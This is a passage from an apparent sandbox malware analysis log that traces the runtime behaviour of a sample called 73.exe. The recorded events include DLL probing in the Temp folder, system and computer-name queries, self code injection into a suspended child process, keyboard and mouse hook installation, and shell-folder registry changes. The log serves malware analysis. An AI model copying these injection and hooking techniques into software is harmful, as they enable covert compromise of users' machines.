- value: C:\WINDOWS\system32\WindowsPowerShell\v1.0\FQ2SznG21IEC5G4
- processinfo:
- pid: 1824
- imagepath: C:\Documents and Settings\admin\Local Settings\Temp\73.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 0
- failure: open
- ntstatus: 0xc0000034
- CreateOptions: 0x200000
- file:
- timestamp: 44781
- mode: failed
- sequenceNumber: 21
- value: C:\Program Files\Debugging Tools for Windows (x86)\FQ2SznG21IEC5G4
- processinfo:
- pid: 1824
- imagepath: C:\Documents and Settings\admin\Local Settings\Temp\73.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 0
- failure: open
- ntstatus: 0xc0000034
- CreateOptions: 0x200000
- file:
- timestamp: 44803
- mode: failed
- sequenceNumber: 22
- value: C:\DOCUME~1\admin\LOCALS~1\Temp\cfgmgr32.dll
- processinfo:
- tainted: true
- pid: 1824
- imagepath: C:\Documents and Settings\admin\Local Settings\Temp\73.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 0
- failure: open
- ntstatus: 0xc0000034
- CreateOptions: 0x200000
- PE:
- InspectionType: Ext
- file:
- timestamp: 45025
- mode: failed
- sequenceNumber: 23
- value: C:\DOCUME~1\admin\LOCALS~1\Temp\setupapi.dll
- processinfo:
- tainted: true
- pid: 1824
- imagepath: C:\Documents and Settings\admin\Local Settings\Temp\73.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 0
- failure: open
- ntstatus: 0xc0000034
- CreateOptions: 0x200000
- PE:
- InspectionType: Ext
- apicall:
- timestamp: 45097
- sequenceNumber: 24
- processinfo:
- pid: 1824
- imagepath: C:\Documents and Settings\admin\Local Settings\Temp\73.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- dllname: kernel32.dll
- apiname: GetSystemDirectoryW
- address: 0x77927324
- params:
- param (id:1): 0x12f80c
- param (id:2): 260
- apicall:
- timestamp: 45102
- sequenceNumber: 25
- processinfo:
- pid: 1824
- imagepath: C:\Documents and Settings\admin\Local Settings\Temp\73.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- dllname: kernel32.dll
- apiname: GetComputerNameExW
- address: 0x77927048
- params:
- param (id:1): 0
- param (id:2): 0x12f840
- param (id:3): 0x12f83c
- apicall:
- timestamp: 45106
- sequenceNumber: 26
- processinfo:
- pid: 1824
- imagepath: C:\Documents and Settings\admin\Local Settings\Temp\73.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- dllname: kernel32.dll
- apiname: GetComputerNameExW
- address: 0x779270ab
- params:
- param (id:1): 3
- param (id:2): 0x12f840
- param (id:3): 0x12f83c
- regkey:
- randomized: true
- mode: queryvalue
- sequenceNumber: 27
- timestamp: 45111
- value: \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\ComputerName\ActiveComputerName\"ComputerName"
- processinfo:
- pid: 1824
- imagepath: C:\Documents and Settings\admin\Local Settings\Temp\73.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- regkey:
- timestamp: 45273
- mode: added
- sequenceNumber: 28
- value: \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\Modem\Enum
- processinfo:
- pid: 552
- imagepath: C:\WINDOWS\system32\services.exe
- md5sum: 0e776ed5f7cc9f94299e70461b7b8185
- regkey:
- timestamp: 45273
- mode: setval
- sequenceNumber: 29
- value: \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\Modem\Enum\"0" = Root\LEGACY_MODEM\0000
- processinfo:
- pid: 552
- imagepath: C:\WINDOWS\system32\services.exe
- md5sum: 0e776ed5f7cc9f94299e70461b7b8185
- regkey:
- timestamp: 45273
- mode: setval
- sequenceNumber: 30
- value: \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\Modem\Enum\"Count" = 0x00000001
- processinfo:
- pid: 552
- imagepath: C:\WINDOWS\system32\services.exe
- md5sum: 0e776ed5f7cc9f94299e70461b7b8185
- regkey:
- timestamp: 45273
- mode: setval
- sequenceNumber: 31
- value: \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\Modem\Enum\"NextInstance" = 0x00000001
- processinfo:
- pid: 552
- imagepath: C:\WINDOWS\system32\services.exe
- md5sum: 0e776ed5f7cc9f94299e70461b7b8185
- file:
- timestamp: 45362
- mode: failed
- sequenceNumber: 32
- value: C:\WINDOWS\Fonts\R38QI00A0M0\D77273J5H4B
- processinfo:
- pid: 1824
- imagepath: C:\Documents and Settings\admin\Local Settings\Temp\73.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 0
- failure: open
- ntstatus: 0xc000003a
- CreateOptions: 0x200000
- file:
- timestamp: 45366
- mode: failed
- sequenceNumber: 33
- value: C:\DOCUME~1\admin\LOCALS~1\Temp\R38QI00A0M0\D77273J5H4B
- processinfo:
- pid: 1824
- imagepath: C:\Documents and Settings\admin\Local Settings\Temp\73.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 0
- failure: open
- ntstatus: 0xc000003a
- CreateOptions: 0x200000
- file:
- timestamp: 45370
- mode: failed
- sequenceNumber: 34
- value: C:\DOCUME~1\admin\LOCALS~1\Temp\R38QI00a0m0\D77273j5H4b
- processinfo:
- pid: 1824
- imagepath: C:\Documents and Settings\admin\Local Settings\Temp\73.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 0
- failure: open
- ntstatus: 0xc000003a
- CreateOptions: 0x200000
- file:
- timestamp: 45375
- mode: failed
- sequenceNumber: 35
- value: C:\WINDOWS\system32\R38QI00A0M0\D77273J5H4B
- processinfo:
- pid: 1824
- imagepath: C:\Documents and Settings\admin\Local Settings\Temp\73.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 0
- failure: open
- ntstatus: 0xc000003a
- CreateOptions: 0x200000
- file:
- timestamp: 45379
- mode: failed
- sequenceNumber: 36
- value: C:\WINDOWS\system\R38QI00A0M0\D77273J5H4B
- processinfo:
- pid: 1824
- imagepath: C:\Documents and Settings\admin\Local Settings\Temp\73.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 0
- failure: open
- ntstatus: 0xc000003a
- CreateOptions: 0x200000
- file:
- timestamp: 45383
- mode: failed
- sequenceNumber: 37
- value: C:\WINDOWS\R38QI00A0M0\D77273J5H4B
- processinfo:
- pid: 1824
- imagepath: C:\Documents and Settings\admin\Local Settings\Temp\73.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 0
- failure: open
- ntstatus: 0xc000003a
- CreateOptions: 0x200000
- file:
- timestamp: 45438
- mode: failed
- sequenceNumber: 38
- value: C:\WINDOWS\system32\wbem\R38QI00A0M0\D77273J5H4B
- processinfo:
- pid: 1824
- imagepath: C:\Documents and Settings\admin\Local Settings\Temp\73.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 0
- failure: open
- ntstatus: 0xc000003a
- CreateOptions: 0x200000
- file:
- timestamp: 45442
- mode: failed
- sequenceNumber: 39
- value: C:\Program Files\QuickTime\QTSystem\R38QI00A0M0\D77273J5H4B
- processinfo:
- pid: 1824
- imagepath: C:\Documents and Settings\admin\Local Settings\Temp\73.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 0
- failure: open
- ntstatus: 0xc000003a
- CreateOptions: 0x200000
- file:
- timestamp: 45446
- mode: failed
- sequenceNumber: 40
- value: C:\WINDOWS\system32\WindowsPowerShell\v1.0\R38QI00A0M0\D77273J5H4B
- processinfo:
- pid: 1824
- imagepath: C:\Documents and Settings\admin\Local Settings\Temp\73.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 0
- failure: open
- ntstatus: 0xc000003a
- CreateOptions: 0x200000
- file:
- timestamp: 45450
- mode: failed
- sequenceNumber: 41
- value: C:\Program Files\Debugging Tools for Windows (x86)\R38QI00A0M0\D77273J5H4B
- processinfo:
- pid: 1824
- imagepath: C:\Documents and Settings\admin\Local Settings\Temp\73.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 0
- failure: open
- ntstatus: 0xc000003a
- CreateOptions: 0x200000
- apicall:
- timestamp: 45392
- sequenceNumber: 42
- processinfo:
- pid: 1824
- imagepath: C:\Documents and Settings\admin\Local Settings\Temp\73.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- dllname: user32.dll
- apiname: EnumWindows
- address: 0x003d0eba
- params:
- param (id:1): 0x3d0e20
- param (id:2): 0x12f5f0
- apicall:
- timestamp: 45457
- sequenceNumber: 43
- processinfo:
- pid: 1824
- imagepath: C:\Documents and Settings\admin\Local Settings\Temp\73.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- dllname: kernel32.dll
- apiname: Sleep
- address: 0x003d11cc
- params:
- param (id:1): 1100
- process:
- timestamp: 46614
- mode: started
- sequenceNumber: 44
- value: C:\Documents and Settings\admin\Local Settings\Temp\73.exe
- pid: 364
- ppid: 1824
- parentname: C:\Documents and Settings\admin\Local Settings\Temp\73.exe
- cmdline: "C:\DOCUME~1\admin\LOCALS~1\Temp\73.exe"
- filesize: 364544
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- sha1sum: 8d149bc90e10db7571379dc0e62409cdcfb7427c
- ads:
- fid (ads:): 3096224743826754
- codeinjection:
- timestamp: 46621
- suppressed: false
- mode: create process suspended memory write code injection
- sequenceNumber: 45
- source:
- tainted: true
- processinfo:
- pid: 1824
- imagepath: C:\Documents and Settings\admin\Local Settings\Temp\73.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- target:
- tainted: true
- processinfo:
- pid: 364
- imagepath: C:\Documents and Settings\admin\Local Settings\Temp\73.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- malicious-alert:
- classtype: Code-Injection-Tracking
- weight: 0
- ruleid: 4610 : Code Injection Obsevered ; Self Code Injection Tracking
- msg: Self Code Injection Tracking
- display-msg: Code Injection Obsevered
- process:
- timestamp: 46632
- mode: terminated
- sequenceNumber: 46
- value: C:\Documents and Settings\admin\Local Settings\Temp\73.exe
- pid: 1824
- ppid: 2684
- parentname: C:\WINDOWS\explorer.exe
- cmdline: N/A
- ads:
- fid (ads:): 3096224743826754
- file:
- timestamp: 46641
- mode: failed
- sequenceNumber: 47
- value: C:\DOCUME~1\admin\LOCALS~1\Temp\LPK.DLL
- processinfo:
- tainted: true
- pid: 364
- imagepath: C:\Documents and Settings\admin\Local Settings\Temp\73.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 0
- failure: open
- ntstatus: 0xc0000034
- CreateOptions: 0x200000
- PE:
- InspectionType: Ext
- file:
- timestamp: 46648
- mode: failed
- sequenceNumber: 48
- value: C:\DOCUME~1\admin\LOCALS~1\Temp\USP10.dll
- processinfo:
- tainted: true
- pid: 364
- imagepath: C:\Documents and Settings\admin\Local Settings\Temp\73.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 0
- failure: open
- ntstatus: 0xc0000034
- CreateOptions: 0x200000
- PE:
- InspectionType: Ext
- process:
- timestamp: 46692
- mode: duplicate_opened
- sequenceNumber: 49
- desiredaccess: 0x00000000
- ntstatus: 0x00000000
- target:
- processinfo:
- pid: 364
- imagepath: C:\Documents and Settings\admin\Local Settings\Temp\73.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- duplicate_source:
- processinfo:
- pid: 364
- tid: 0
- imagepath: C:\Documents and Settings\admin\Local Settings\Temp\73.exe
- duplicate_target:
- processinfo:
- pid: 364
- tid: 0
- imagepath: C:\Documents and Settings\admin\Local Settings\Temp\73.exe
- InheritHandle: 0x00000000
- Options: 0x00000002
- source:
- processinfo:
- pid: 364
- imagepath: C:\Documents and Settings\admin\Local Settings\Temp\73.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- regkey:
- timestamp: 46703
- mode: added
- sequenceNumber: 50
- value: \REGISTRY\USER\S-1-5-21-1409082233-688789844-725345543-1003\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings
- processinfo:
- pid: 364
- imagepath: C:\Documents and Settings\admin\Local Settings\Temp\73.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- regkey:
- randomized: true
- mode: queryvalue
- sequenceNumber: 51
- timestamp: 46710
- value: \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\ComputerName\ActiveComputerName\"ComputerName"
- processinfo:
- pid: 364
- imagepath: C:\Documents and Settings\admin\Local Settings\Temp\73.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- regkey:
- timestamp: 46799
- mode: added
- sequenceNumber: 52
- value: \REGISTRY\USER\S-1-5-21-1409082233-688789844-725345543-1003\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders
- processinfo:
- pid: 364
- imagepath: C:\Documents and Settings\admin\Local Settings\Temp\73.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- regkey:
- timestamp: 46804
- mode: added
- sequenceNumber: 53
- value: \REGISTRY\USER\S-1-5-21-1409082233-688789844-725345543-1003\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders
- processinfo:
- pid: 364
- imagepath: C:\Documents and Settings\admin\Local Settings\Temp\73.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- regkey:
- timestamp: 46808
- mode: setval
- sequenceNumber: 54
- value: \REGISTRY\USER\S-1-5-21-1409082233-688789844-725345543-1003\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders\"AppData" = C:\Documents and Settings\admin\Application Data
- processinfo:
- pid: 364
- imagepath: C:\Documents and Settings\admin\Local Settings\Temp\73.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- apicall:
- timestamp: 46814
- sequenceNumber: 55
- processinfo:
- pid: 364
- imagepath: C:\Documents and Settings\admin\Local Settings\Temp\73.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- dllname: kernel32.dll
- apiname: Sleep
- address: 0x0042207d
- params:
- param (id:1): 15
- apicall:
- timestamp: 46824
- sequenceNumber: 56
- processinfo:
- pid: 364
- imagepath: C:\Documents and Settings\admin\Local Settings\Temp\73.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- dllname: kernel32.dll
- apiname: Sleep
- address: 0x0042207d
- params:
- param (id:1): 15
- apicall:
- timestamp: 46840
- sequenceNumber: 57
- processinfo:
- pid: 364
- imagepath: C:\Documents and Settings\admin\Local Settings\Temp\73.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- dllname: kernel32.dll
- apiname: Sleep
- address: 0x0042207d
- params:
- param (id:1): 15
- apicall:
- timestamp: 46855
- sequenceNumber: 58
- processinfo:
- pid: 364
- imagepath: C:\Documents and Settings\admin\Local Settings\Temp\73.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- dllname: kernel32.dll
- apiname: Sleep
- address: 0x0042207d
- params:
- param (id:1): 15
- apicall:
- timestamp: 46871
- sequenceNumber: 59
- processinfo:
- pid: 364
- imagepath: C:\Documents and Settings\admin\Local Settings\Temp\73.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- dllname: kernel32.dll
- apiname: Sleep
- address: 0x0042207d
- params:
- param (id:1): 15
- apicall:
- timestamp: 46888
- sequenceNumber: 60
- processinfo:
- pid: 364
- imagepath: C:\Documents and Settings\admin\Local Settings\Temp\73.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- dllname: kernel32.dll
- apiname: Sleep
- address: 0x0042207d
- params:
- param (id:1): 15
- apicall:
- timestamp: 46902
- sequenceNumber: 61
- processinfo:
- pid: 364
- imagepath: C:\Documents and Settings\admin\Local Settings\Temp\73.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- dllname: kernel32.dll
- apiname: Sleep
- address: 0x0042207d
- params:
- param (id:1): 15
- apicall:
- timestamp: 46918
- sequenceNumber: 62
- processinfo:
- pid: 364
- imagepath: C:\Documents and Settings\admin\Local Settings\Temp\73.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- dllname: kernel32.dll
- apiname: Sleep
- address: 0x0042207d
- params:
- param (id:1): 15
- apicall:
- timestamp: 46933
- sequenceNumber: 63
- processinfo:
- pid: 364
- imagepath: C:\Documents and Settings\admin\Local Settings\Temp\73.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- dllname: kernel32.dll
- apiname: Sleep
- address: 0x0042207d
- params:
- param (id:1): 15
- file:
- timestamp: 46951
- mode: failed
- sequenceNumber: 64
- value: C:\DOCUME~1\admin\LOCALS~1\Temp\CLBCATQ.DLL
- processinfo:
- tainted: true
- pid: 364
- imagepath: C:\Documents and Settings\admin\Local Settings\Temp\73.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 0
- failure: open
- ntstatus: 0xc0000034
- CreateOptions: 0x200000
- PE:
- InspectionType: Ext
- file:
- timestamp: 46957
- mode: failed
- sequenceNumber: 65
- value: C:\DOCUME~1\admin\LOCALS~1\Temp\COMRes.dll
- processinfo:
- tainted: true
- pid: 364
- imagepath: C:\Documents and Settings\admin\Local Settings\Temp\73.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 0
- failure: open
- ntstatus: 0xc0000034
- CreateOptions: 0x200000
- PE:
- InspectionType: Ext
- apicall:
- timestamp: 46962
- sequenceNumber: 66
- processinfo:
- pid: 364
- imagepath: C:\Documents and Settings\admin\Local Settings\Temp\73.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- dllname: kernel32.dll
- apiname: GetSystemDirectoryW
- address: 0x76fd7ee4
- params:
- param (id:1): 0x77043650
- param (id:2): 261
- mutex:
- timestamp: 47280
- sequenceNumber: 67
- value: \BaseNamedObjects\AMResourceMutex2
- processinfo:
- pid: 364
- imagepath: C:\Documents and Settings\admin\Local Settings\Temp\73.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- mutex:
- timestamp: 47321
- sequenceNumber: 68
- value: \BaseNamedObjects\VideoRenderer
- processinfo:
- pid: 364
- imagepath: C:\Documents and Settings\admin\Local Settings\Temp\73.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- apicall:
- timestamp: 47326
- sequenceNumber: 69
- processinfo:
- pid: 364
- imagepath: C:\Documents and Settings\admin\Local Settings\Temp\73.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- dllname: kernel32.dll
- apiname: GetSystemDirectoryA
- address: 0x74723c7f
- params:
- param (id:1): 0xd3f568
- param (id:2): 261
- apicall:
- timestamp: 47330
- sequenceNumber: 70
- processinfo:
- pid: 364
- imagepath: C:\Documents and Settings\admin\Local Settings\Temp\73.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- dllname: kernel32.dll
- apiname: GetSystemDirectoryA
- address: 0x74723c7f
- params:
- param (id:1): 0xd3f570
- param (id:2): 261
- mutex:
- timestamp: 47331
- sequenceNumber: 71
- value: \BaseNamedObjects\CTF.LBES.MutexDefaultS-1-5-21-1409082233-688789844-725345543-1003
- processinfo:
- pid: 364
- imagepath: C:\Documents and Settings\admin\Local Settings\Temp\73.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- mutex:
- timestamp: 47331
- sequenceNumber: 72
- value: \BaseNamedObjects\CTF.Compart.MutexDefaultS-1-5-21-1409082233-688789844-725345543-1003
- processinfo:
- pid: 364
- imagepath: C:\Documents and Settings\admin\Local Settings\Temp\73.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- mutex:
- timestamp: 47331
- sequenceNumber: 73
- value: \BaseNamedObjects\CTF.Asm.MutexDefaultS-1-5-21-1409082233-688789844-725345543-1003
- processinfo:
- pid: 364
- imagepath: C:\Documents and Settings\admin\Local Settings\Temp\73.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- mutex:
- timestamp: 47331
- sequenceNumber: 74
- value: \BaseNamedObjects\CTF.Layouts.MutexDefaultS-1-5-21-1409082233-688789844-725345543-1003
- processinfo:
- pid: 364
- imagepath: C:\Documents and Settings\admin\Local Settings\Temp\73.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- mutex:
- timestamp: 47331
- sequenceNumber: 75
- value: \BaseNamedObjects\CTF.TMD.MutexDefaultS-1-5-21-1409082233-688789844-725345543-1003
- processinfo:
- pid: 364
- imagepath: C:\Documents and Settings\admin\Local Settings\Temp\73.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- apicall:
- timestamp: 47331
- sequenceNumber: 76
- processinfo:
- pid: 364
- imagepath: C:\Documents and Settings\admin\Local Settings\Temp\73.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- dllname: kernel32.dll
- apiname: GetSystemDirectoryA
- address: 0x74723c7f
- params:
- param (id:1): 0xd3f4bc
- param (id:2): 261
- mutex:
- timestamp: 47368
- sequenceNumber: 77
- value: \BaseNamedObjects\CTF.TimListCache.FMPDefaultS-1-5-21-1409082233-688789844-725345543-1003MUTEX.DefaultS-1-5-21-1409082233-688789844-725345543-1003
- processinfo:
- pid: 364
- imagepath: C:\Documents and Settings\admin\Local Settings\Temp\73.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- apicall:
- timestamp: 47373
- sequenceNumber: 78
- processinfo:
- pid: 364
- imagepath: C:\Documents and Settings\admin\Local Settings\Temp\73.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- dllname: user32.dll
- apiname: SetWindowsHookExA
- address: 0x7473097c
- params:
- param (id:1): 2
- param (id:2): 0x747307c3
- param (id:3): 0x74720000
- param (id:4): 856
- apicall:
- timestamp: 47378
- sequenceNumber: 79
- processinfo:
- pid: 364
- imagepath: C:\Documents and Settings\admin\Local Settings\Temp\73.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- dllname: user32.dll
- apiname: SetWindowsHookExA
- address: 0x7473099a
- params:
- param (id:1): 7
- param (id:2): 0x747304cd
- param (id:3): 0x74720000
- param (id:4): 856
- apicall:
- timestamp: 47383
- sequenceNumber: 80
- processinfo:
- pid: 364
- imagepath: C:\Documents and Settings\admin\Local Settings\Temp\73.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- dllname: kernel32.dll
- apiname: GetSystemDirectoryW
- address: 0x763982be
- params:
- param (id:1): 0xd3ef98
- param (id:2): 260
- apicall:
- timestamp: 47391
- sequenceNumber: 81
- processinfo:
- pid: 364
- imagepath: C:\Documents and Settings\admin\Local Settings\Temp\73.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- dllname: kernel32.dll
- apiname: GetSystemDirectoryW
- address: 0x763982be
- params:
- param (id:1): 0xd3f548
- param (id:2): 260
- apicall:
- timestamp: 47396
- sequenceNumber: 82
- processinfo:
- pid: 364
- imagepath: C:\Documents and Settings\admin\Local Settings\Temp\73.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- dllname: kernel32.dll
- apiname: GetSystemDirectoryA
- address: 0x755dd289
- params:
- param (id:1): 0xd3eb8c
- param (id:2): 261
- apicall:
- timestamp: 47400
- sequenceNumber: 83
- processinfo:
- pid: 364
- imagepath: C:\Documents and Settings\admin\Local Settings\Temp\73.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- dllname: kernel32.dll
- apiname: GetSystemDirectoryA
- address: 0x755dd289
- params:
- param (id:1): 0xd3f630
- param (id:2): 261
- apicall:
- timestamp: 47405
- sequenceNumber: 84
- processinfo:
- pid: 364
- imagepath: C:\Documents and Settings\admin\Local Settings\Temp\73.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- dllname: kernel32.dll
- apiname: GetSystemDirectoryW
- address: 0x763982be
- params:
- param (id:1): 0xd3f1b8
- param (id:2): 260
- file:
- timestamp: 47412
- mode: failed
- sequenceNumber: 85
- value: C:\DOCUME~1\admin\LOCALS~1\Temp\MSVFW32.dll
- processinfo:
- tainted: true
- pid: 364
- imagepath: C:\Documents and Settings\admin\Local Settings\Temp\73.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 0
- failure: open
- ntstatus: 0xc0000034
- CreateOptions: 0x200000
- PE:
- InspectionType: Ext
- regkey:
- timestamp: 47620
- mode: added
- sequenceNumber: 86
- value: \REGISTRY\USER\S-1-5-21-1409082233-688789844-725345543-1003\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders
- processinfo:
- pid: 364
- imagepath: C:\Documents and Settings\admin\Local Settings\Temp\73.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- regkey:
- timestamp: 47624
- mode: setval
- sequenceNumber: 87
- value: \REGISTRY\USER\S-1-5-21-1409082233-688789844-725345543-1003\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders\"CD Burning" = C:\Documents and Settings\admin\Local Settings\Application Data\Microsoft\CD Burning
- processinfo:
- pid: 364
- imagepath: C:\Documents and Settings\admin\Local Settings\Temp\73.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- regkey:
- timestamp: 47629
- mode: added
- sequenceNumber: 88
- value: \REGISTRY\USER\S-1-5-21-1409082233-688789844-725345543-1003\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders
- processinfo:
- pid: 364
- imagepath: C:\Documents and Settings\admin\Local Settings\Temp\73.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- folder:
- timestamp: 47634
- mode: open
- sequenceNumber: 89
- value: C:\Documents and Settings\admin\My Documents
- processinfo:
- pid: 364
- imagepath: C:\Documents and Settings\admin\Local Settings\Temp\73.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ntstatus: 0x0
- CreateOptions: 0x200000
- regkey:
- timestamp: 47637
- mode: added
- sequenceNumber: 90
- value: \REGISTRY\USER\S-1-5-21-1409082233-688789844-725345543-1003\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders
- processinfo:
- pid: 364
- imagepath: C:\Documents and Settings\admin\Local Settings\Temp\73.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- regkey:
- timestamp: 47641
- mode: setval
- sequenceNumber: 91
- value: \REGISTRY\USER\S-1-5-21-1409082233-688789844-725345543-1003\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders\"Personal" = C:\Documents and Settings\admin\My Documents
- processinfo:
- pid: 364
- imagepath: C:\Documents and Settings\admin\Local Settings\Temp\73.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- regkey:
- timestamp: 47645
- mode: added
- sequenceNumber: 92
- value: \REGISTRY\USER\S-1-5-21-1409082233-688789844-725345543-1003\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders
- processinfo:
- pid: 364
- imagepath: C:\Documents and Settings\admin\Local Settings\Temp\73.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- regkey:
- timestamp: 47649
- mode: added
- sequenceNumber: 93
- value: \REGISTRY\USER\S-1-5-21-1409082233-688789844-725345543-1003\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders
- processinfo:
- pid: 364
- imagepath: C:\Documents and Settings\admin\Local Settings\Temp\73.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- regkey:
- timestamp: 47653
- mode: setval
- sequenceNumber: 94
- value: \REGISTRY\USER\S-1-5-21-1409082233-688789844-725345543-1003\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders\"Desktop" = C:\Documents and Settings\admin\Desktop
- processinfo:
- pid: 364
- imagepath: C:\Documents and Settings\admin\Local Settings\Temp\73.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- regkey:
- timestamp: 47653
- mode: added
- sequenceNumber: 95
- value: \REGISTRY\MACHINE\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders
- processinfo:
- pid: 364
- imagepath: C:\Documents and Settings\admin\Local Settings\Temp\73.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- regkey:
- timestamp: 47662
- mode: added
- sequenceNumber: 96
- value: \REGISTRY\MACHINE\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders
- processinfo:
- pid: 364
- imagepath: C:\Documents and Settings\admin\Local Settings\Temp\73.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- regkey:
- timestamp: 47666
- mode: setval
- sequenceNumber: 97
- value: \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders\"Common Desktop" = C:\Documents and Settings\All Users\Desktop
- processinfo:
- pid: 364
- imagepath: C:\Documents and Settings\admin\Local Settings\Temp\73.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- regkey:
- timestamp: 47672
- mode: added
- sequenceNumber: 98
- value: \REGISTRY\MACHINE\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders
- processinfo:
- pid: 364
- imagepath: C:\Documents and Settings\admin\Local Settings\Temp\73.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- regkey:
- timestamp: 47677
